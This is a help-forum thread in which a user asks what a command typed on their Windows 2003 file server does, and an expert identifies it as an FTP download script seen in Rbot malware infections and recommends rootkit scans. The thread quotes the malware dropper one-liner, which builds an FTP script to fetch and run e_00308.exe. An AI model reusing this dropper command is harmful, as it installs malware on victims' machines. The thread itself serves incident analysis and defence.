• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 207
  • Last Modified:

Command run on file server to connect to FTP Server Windows 2003 Server

Please help the following script was typed into the command run window by a remote user on our file server what does it do if anything

cmd.exe /c del i&echo open 7800 > i&echo  >> i &echo get e_00308.exe >> i &echo quit >> i &f

Please Help
1 Solution
Lee W, MVPTechnology and Business Process AdvisorCommented:
It means:

Delete the file "i" if it exists.
echo (write) "open 7800" to the file "i"
Then echo "get e_00308.exe" to the file "i"
Then echo "quit"" to the file "i"

then run "f"

So you end up with a file "i" on your computer containing these three lines:

open 7800
get e_00308.exe

This is an FTP script.

I saw very similar files on machines infected with malware and Rbot variants (Rbots typically include Root Kit technology).

I strongly suggest you run various AntiSpyware tools AND the tool RootKitRevealer and/or Sophos Root Kit detection tool - www.sophos.com and www.sysinternals.com (for RootKitRevealer)
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Free Tool: Port Scanner

Check which ports are open to the outside world. Helps make sure that your firewall rules are working as intended.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Tackle projects and never again get stuck behind a technical roadblock.
Join Now